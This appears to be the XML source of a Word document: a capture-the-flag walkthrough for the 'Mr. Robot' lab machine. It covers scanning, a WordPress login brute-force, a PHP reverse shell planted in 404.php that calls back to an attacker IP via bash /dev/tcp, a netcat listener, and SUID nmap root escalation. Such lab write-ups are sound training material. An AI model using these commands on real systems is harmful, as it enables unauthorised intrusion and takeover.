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BAE3" w14:textId="185785E6" w:rsidR="00216F22" w:rsidRPr="00216F22" w:rsidRDefault="00216F22" w:rsidP="00216F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Mr. Robot CTF </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201381C4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2765F3E0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The goal is to find three hidden keys within the target machine, inspired by the TV series </w:t>
      </w:r>
      <w:r w:rsidRPr="00216F2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Mr. Robot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49B0A5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56B18EBF">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0A5C5E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Network Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B86655B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nmap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to scan the target machine for open ports and services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7174D8E2" w14:textId="3131AF6D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-T4 192.168.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</w:p>
    <w:p w14:paraId="2AB15C60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This reveals open ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71319588" w14:textId="77777777" w:rsidR="00216F22" w:rsidRPr="00216F22" w:rsidRDefault="00216F22" w:rsidP="00216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(HTTP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16426743" w14:textId="77777777" w:rsidR="00216F22" w:rsidRPr="00216F22" w:rsidRDefault="00216F22" w:rsidP="00216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443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(HTTPS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C803BB3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Website Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7F0B02" w14:textId="3D5BAB6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IP address in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browser (using HTTP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD6226B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Directory Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F342C7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Gobuster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to scan for hidden directories and files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E82FB94" w14:textId="2E91B726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gobuster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http://192.168.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 /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/share/wordlists/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dirb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/common.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FA3E2C" w14:textId="4DE8B93A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found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interesting directories like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/robots.txt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2FFCEB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Analyze </w:t>
      </w:r>
      <w:r w:rsidRPr="00216F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robots.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1406A288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Access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CCBC0D" w14:textId="3AD394A1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/robots.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B571CFB" w14:textId="6A8507BD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Inside the file, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>found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FFB680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77E48627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fsocity.dic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="14FB8F71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key-1-of-3.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BA8C8A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fsocity.dic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file, which is a wordlist, and note the location of the first key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAE3D3C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Finding Key 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036FFBFF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Visit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BA2A4A" w14:textId="6940124B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/key-1-of-3.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F51FC5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Here you will find the </w:t>
      </w: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key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0759A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74BE0E8C">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3C4ECA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WordPress Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A77DE9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The website is running </w:t>
      </w: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WordPress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. Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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wpscan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to enumerate further:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DFAF12" w14:textId="3214038D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wpscan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--enumerate u</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4C2213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This will identify the username as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Elliot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C41942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Brute-Force WordPress Login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4309B119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Using the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fsocity.dic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wordlist (from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), brute-force the WordPress admin login:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142FA671" w14:textId="0A162854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wpscan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http://192.168.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--passwords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fsocity.dic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--usernames Elliot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0310EE48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Once the correct password is found, log in to WordPress as Elliot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B920098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3A4116E8">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2DA926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Gaining Initial Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BF1728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After logging in, you have access to the WordPress dashboard. Now, use a reverse shell to gain a foothold in the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE83937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Shell via Theme Editor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E7CB19" w14:textId="77777777" w:rsidR="00216F22" w:rsidRPr="00216F22" w:rsidRDefault="00216F22" w:rsidP="00216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Appearance &gt; Editor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and edit the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404.php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3C6748F0" w14:textId="77777777" w:rsidR="00216F22" w:rsidRPr="00216F22" w:rsidRDefault="00216F22" w:rsidP="00216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Replace its content with a PHP reverse shell payload (use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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PentestMonkey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PHP reverse shell):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6165E445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4C7AAA8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AEAC891" w14:textId="14FF6C6A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exec(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"/bin/bash -c 'bash -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&gt;&amp; /dev/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192.168.145.135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4444d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0&gt;&amp;1'");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1D6533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1EC03F8E" w14:textId="25EED13C" w:rsidR="00216F22" w:rsidRPr="00216F22" w:rsidRDefault="00216F22" w:rsidP="00216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Set up a listener on machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCD443C" w14:textId="3EF2CE3D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nc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lvnp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4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BF8425" w14:textId="77777777" w:rsidR="00216F22" w:rsidRPr="00216F22" w:rsidRDefault="00216F22" w:rsidP="00216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Visit the modified </w:t>
      </w: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404.php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page on the target machine to trigger the shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408BF982" w14:textId="74E28FA5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5" w:history="1">
        <w:r w:rsidRPr="00216F22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http://192.168.</w:t>
        </w:r>
        <w:r w:rsidRPr="00982A1A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145</w:t>
        </w:r>
        <w:r w:rsidRPr="00216F22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.</w:t>
        </w:r>
        <w:r w:rsidRPr="00982A1A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134</w:t>
        </w:r>
        <w:r w:rsidRPr="00216F22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/</w:t>
        </w:r>
        <w:r w:rsidRPr="00982A1A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dfsdf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asdasdasd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EFC2DF" w14:textId="5B0E4C28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This will give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 a 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reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D13CC44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6E189A78">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B900BB8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Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701E6277" w14:textId="31F283E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Now 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have a shell, stabilize it and look for privilege escalation paths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B45A27" w14:textId="77777777" w:rsidR="00216F22" w:rsidRPr="00216F22" w:rsidRDefault="00216F22" w:rsidP="00216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Stabilize the shell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DC9112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python3 -c 'import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pty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pty.spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB654BA" w14:textId="77777777" w:rsidR="00216F22" w:rsidRPr="00216F22" w:rsidRDefault="00216F22" w:rsidP="00216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second key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DD40B5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Explore the file system and look for any interesting files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68223F92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 -name key-2-of-3.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EDB4AA" w14:textId="4BD52A36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found the 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00216F22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key in one of the user directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E388219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SUID Binaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E3D698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Check for binaries with SUID bit set:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49881425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 -perm -4000 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0479AE74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One of the binaries you might find useful is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657E7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40EAE5C7">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="190728DD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Escalating to Root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B767FF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16F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nmap</w:t>
      </w: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's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mode to escalate to root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111D86F1" w14:textId="77777777" w:rsidR="00216F22" w:rsidRPr="00216F22" w:rsidRDefault="00216F22" w:rsidP="00216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in interactive mode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A61E402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--interactive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0874EAD6" w14:textId="77777777" w:rsidR="00216F22" w:rsidRPr="00216F22" w:rsidRDefault="00216F22" w:rsidP="00216F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216F22">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> shell, execute the following to spawn a root shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0861B983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1678AF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01209DDB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proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5B548A96" w14:textId="77777777" w:rsidR="00216F22" w:rsidRPr="00216F22" w:rsidRDefault="00216F22" w:rsidP="00216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You now have root privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555586E4" w14:textId="77777777" w:rsidR="00216F22" w:rsidRPr="00216F22" w:rsidRDefault="00216F22" w:rsidP="00216F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0E7DEA9F">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D24BB6F" w14:textId="77777777" w:rsidR="00216F22" w:rsidRPr="00216F22" w:rsidRDefault="00216F22" w:rsidP="0021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Finding the Final Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15376CAA" w14:textId="77777777" w:rsidR="00216F22" w:rsidRPr="00216F22" w:rsidRDefault="00216F22" w:rsidP="0021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t>With root access, search for the third key:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198F677A" w14:textId="77777777" w:rsidR="00216F22" w:rsidRPr="00216F22" w:rsidRDefault="00216F22" w:rsidP="0021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 -name key-3-of-3.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDA12CF" w14:textId="134C1F8F" w:rsidR="0052599F" w:rsidRPr="00E94FB4" w:rsidRDefault="00216F22" w:rsidP="00E94F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F22">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:pict w14:anchorId="0F9E9BBF">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0052599F" w:rsidRPr="00E9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38"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2BB06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C7C86"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E8242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8756E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9388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86EE0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8A2A1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900B9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BC7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80B7A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="09D6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D3F20"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E28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B7E17"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="14764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542721">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1003823610">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="172914323">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="848716797">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="166754918">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1667585881">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="194538449">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="69272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A8"/>
    <w:rsid w:val="000F0DA8"/>
    <w:rsid w:val="00216F22"/>
    <w:rsid w:val="0052599F"/>
    <w:rsid w:val="00583C7C"/>
    <w:rsid w:val="007C2EF1"/>
    <w:rsid w:val="009D5EB9"/>
    <w:rsid w:val="00E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704A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{18EADFA7-134D-4A90-99A3-6B5EBC82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45.134/dfs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Androlla</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Androlla</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-09-27T16:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-09-27T16:43:00Z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2024-09-27T16:43:19Z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5b2dcf27-1714-4948-8c7e-f0ada0ce6f0e</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="MSIP_Label_defa4170-0d19-0005-0004-bc88714345d2_ActionId">
    <vt:lpwstr>6abaeb91-de4b-4df7-a7f9-38ae7554490b</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_defa4170-0d19-0005-0004-bc88714345d2_ContentBits">
    <vt:lpwstr>0</vt:lpwstr>
  </property>
</Properties>
</file>